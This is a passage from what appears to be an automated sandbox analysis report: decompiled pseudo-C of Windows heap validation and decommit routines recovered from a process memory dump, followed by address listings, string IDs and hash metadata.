											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E055AB150();
										} else {
											E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E055AB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E055AB150();
									} else {
										E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E055AB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E055AB150();
								} else {
									E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E055AB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E055AB150();
							} else {
								E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E05664AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0565FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E056523E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                        0x056644a1
                                                                        0x056644a3
                                                                        0x056644a7
                                                                        0x056644ac
                                                                        0x056644af
                                                                        0x056644b2
                                                                        0x056644b9
                                                                        0x056644bc
                                                                        0x056647f2
                                                                        0x056647f2
                                                                        0x056647f8
                                                                        0x056647fc
                                                                        0x056647fe
                                                                        0x05664804
                                                                        0x05664805
                                                                        0x05664805
                                                                        0x0566480c
                                                                        0x05664810
                                                                        0x05664812
                                                                        0x05664812
                                                                        0x05664812
                                                                        0x05664822
                                                                        0x05664822
                                                                        0x05664827
                                                                        0x05664827
                                                                        0x00000000
                                                                        0x05664827
                                                                        0x056644c4
                                                                        0x056644d3
                                                                        0x056644d9
                                                                        0x056644dc
                                                                        0x056644de
                                                                        0x056644e0
                                                                        0x05664560
                                                                        0x05664520
                                                                        0x05664522
                                                                        0x05664525
                                                                        0x05664528
                                                                        0x0566452b
                                                                        0x0566452e
                                                                        0x05664530
                                                                        0x05664697
                                                                        0x0566469d
                                                                        0x056646a1
                                                                        0x056646c0
                                                                        0x056646c5
                                                                        0x056646a3
                                                                        0x056646b8
                                                                        0x056646bd
                                                                        0x056646cb
                                                                        0x056646d4
                                                                        0x05664677
                                                                        0x05664677
                                                                        0x05664679
                                                                        0x0566467c
                                                                        0x0566468a
                                                                        0x05664690
                                                                        0x05664690
                                                                        0x056647f1
                                                                        0x056647f1
                                                                        0x056647f1
                                                                        0x00000000
                                                                        0x056647f1
                                                                        0x05664536
                                                                        0x05664539
                                                                        0x0566453c
                                                                        0x05664636
                                                                        0x0566463c
                                                                        0x05664640
                                                                        0x0566465f
                                                                        0x05664664
                                                                        0x05664642
                                                                        0x05664657
                                                                        0x0566465c
                                                                        0x05664670
                                                                        0x00000000
                                                                        0x05664542
                                                                        0x05664542
                                                                        0x05664546
                                                                        0x05664548
                                                                        0x0566454b
                                                                        0x05664555
                                                                        0x0566455b
                                                                        0x0566455b
                                                                        0x0566455b
                                                                        0x0566455d
                                                                        0x0566455d
                                                                        0x0566455d
                                                                        0x00000000
                                                                        0x0566455d
                                                                        0x0566453c
                                                                        0x05664579
                                                                        0x0566457c
                                                                        0x05664587
                                                                        0x05664589
                                                                        0x05664591
                                                                        0x05664592
                                                                        0x05664597
                                                                        0x05664598
                                                                        0x056645a1
                                                                        0x056645ab
                                                                        0x056645ab
                                                                        0x056645a1
                                                                        0x056645ae
                                                                        0x056645b4
                                                                        0x056645b9
                                                                        0x056645bd
                                                                        0x05664759
                                                                        0x05664759
                                                                        0x0566475f
                                                                        0x05664761
                                                                        0x05664763
                                                                        0x05664765
                                                                        0x05664768
                                                                        0x0566476b
                                                                        0x0566476d
                                                                        0x0566479c
                                                                        0x0566479c
                                                                        0x0566479f
                                                                        0x056647a2
                                                                        0x056647a4
                                                                        0x05664830
                                                                        0x05664833
                                                                        0x05664879
                                                                        0x0566487d
                                                                        0x056648f1
                                                                        0x056648f3
                                                                        0x056648f3
                                                                        0x00000000
                                                                        0x056648f3
                                                                        0x0566487f
                                                                        0x05664885
                                                                        0x05664887
                                                                        0x056648a8
                                                                        0x056648a8
                                                                        0x056648ae
                                                                        0x056648b0
                                                                        0x056648dc
                                                                        0x056648dc
                                                                        0x056648dc
                                                                        0x056648dc
                                                                        0x056648ec
                                                                        0x00000000
                                                                        0x056648ec
                                                                        0x056648b2
                                                                        0x056648bc
                                                                        0x056648be
                                                                        0x056648c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056648c3
                                                                        0x056648c3
                                                                        0x056648c6
                                                                        0x056648c9
                                                                        0x056648cc
                                                                        0x056648d1
                                                                        0x056648d4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056648d6
                                                                        0x056648d7
                                                                        0x056648da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056648da
                                                                        0x0566494f
                                                                        0x05664955
                                                                        0x05664959
                                                                        0x05664978
                                                                        0x0566497d
                                                                        0x0566495b
                                                                        0x05664970
                                                                        0x05664975
                                                                        0x05664986
                                                                        0x05664987
                                                                        0x0566498a
                                                                        0x0566498d
                                                                        0x05664997
                                                                        0x056647ef
                                                                        0x056647ef
                                                                        0x056647ef
                                                                        0x00000000
                                                                        0x056647ef
                                                                        0x05664890
                                                                        0x05664890
                                                                        0x05664891
                                                                        0x05664891
                                                                        0x05664894
                                                                        0x05664897
                                                                        0x0566489d
                                                                        0x056648a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056648a2
                                                                        0x056648a3
                                                                        0x056648a6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056648a6
                                                                        0x056648fb
                                                                        0x05664901
                                                                        0x05664905
                                                                        0x05664924
                                                                        0x05664929
                                                                        0x05664907
                                                                        0x0566491c
                                                                        0x05664921
                                                                        0x0566492f
                                                                        0x05664935
                                                                        0x05664936
                                                                        0x05664939
                                                                        0x05664942
                                                                        0x00000000
                                                                        0x05664947
                                                                        0x05664835
                                                                        0x0566483b
                                                                        0x0566483f
                                                                        0x0566485e
                                                                        0x05664863
                                                                        0x05664841
                                                                        0x05664856
                                                                        0x0566485b
                                                                        0x05664869
                                                                        0x0566486c
                                                                        0x0566486f
                                                                        0x056647e7
                                                                        0x056647e7
                                                                        0x00000000
                                                                        0x056647ec
                                                                        0x056647aa
                                                                        0x056647b0
                                                                        0x056647b4
                                                                        0x056647d3
                                                                        0x056647d8
                                                                        0x056647b6
                                                                        0x056647cb
                                                                        0x056647d0
                                                                        0x056647de
                                                                        0x056647df
                                                                        0x056647e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566476f
                                                                        0x0566476f
                                                                        0x05664778
                                                                        0x05664785
                                                                        0x05664787
                                                                        0x0566478c
                                                                        0x0566478e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664790
                                                                        0x05664792
                                                                        0x05664794
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664796
                                                                        0x05664799
                                                                        0x00000000
                                                                        0x05664799
                                                                        0x00000000
                                                                        0x056645c3
                                                                        0x056645c3
                                                                        0x056645c7
                                                                        0x056645c7
                                                                        0x056645ca
                                                                        0x056645cf
                                                                        0x056645d3
                                                                        0x056645df
                                                                        0x056645e4
                                                                        0x056645e6
                                                                        0x056645e8
                                                                        0x056645ed
                                                                        0x056645ed
                                                                        0x056645f2
                                                                        0x056645f2
                                                                        0x056645f7
                                                                        0x056645fc
                                                                        0x05664602
                                                                        0x05664606
                                                                        0x05664609
                                                                        0x0566460f
                                                                        0x056646de
                                                                        0x056646e3
                                                                        0x056646e5
                                                                        0x056646ec
                                                                        0x056646ee
                                                                        0x056646f6
                                                                        0x056646f6
                                                                        0x056646f6
                                                                        0x056646f6
                                                                        0x056646ec
                                                                        0x05664615
                                                                        0x05664615
                                                                        0x0566461d
                                                                        0x0566462e
                                                                        0x0566462e
                                                                        0x0566461d
                                                                        0x0566460f
                                                                        0x05664609
                                                                        0x056646fd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664710
                                                                        0x0566471a
                                                                        0x05664720
                                                                        0x05664720
                                                                        0x05664722
                                                                        0x0566472c
                                                                        0x00000000
                                                                        0x0566472e
                                                                        0x0566472e
                                                                        0x00000000
                                                                        0x0566472e
                                                                        0x0566472c
                                                                        0x05664738
                                                                        0x0566473c
                                                                        0x0566474b
                                                                        0x05664751
                                                                        0x05664751
                                                                        0x00000000
                                                                        0x0566473c
                                                                        0x056648f4
                                                                        0x056648f4
                                                                        0x00000000
                                                                        0x056648f4

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                        • API String ID: 0-1357697941
                                                                        • Opcode ID: a87ecec81a46c49e23e96476efbe0f42a5a9a16dcb952eebd88e36f70ff1703e
                                                                        • Instruction ID: 41e1949af384e8a2dae501ecfdf3b984d6dc07905bcd21aae120db2864b56125
                                                                        • Opcode Fuzzy Hash: a87ecec81a46c49e23e96476efbe0f42a5a9a16dcb952eebd88e36f70ff1703e
                                                                        • Instruction Fuzzy Hash: F5F12D31604646EFCF25DFA8C484BBABBF2FF89305F148119E44697B40CB70A986CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CA309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E055CA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x5698a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E055CA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E055CDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E055A9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E055AA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x5698748 - 1;
						if( *0x5698748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E055AB150();
								} else {
									E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E055AB150();
								__eflags =  *0x5697bc8;
								if( *0x5697bc8 == 0) {
									__eflags = 1;
									E05662073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x5698748 - 1;
							if( *0x5698748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E055D174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E055C7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E056614FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E055A9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E055A9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x5698748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E055AB150();
											} else {
												E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E055AB150();
											_pop(_t491);
											__eflags =  *0x5697bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E05662073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0566A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E055CA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E055C7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E055C7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E05661411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E055C7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E055C7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x5698748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E055AB150();
							} else {
								E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E055AB150();
							__eflags =  *0x5697bc8;
							if( *0x5697bc8 == 0) {
								__eflags = 0;
								E05662073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x5698748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E055AB150();
												} else {
													E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E055AB150();
												__eflags =  *0x5697bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E05662073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0566A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E055CA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E055CB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E055CA830(_t553, _v64, _v24);
								_t286 = E055C7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E055C7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E05661411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E055C7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
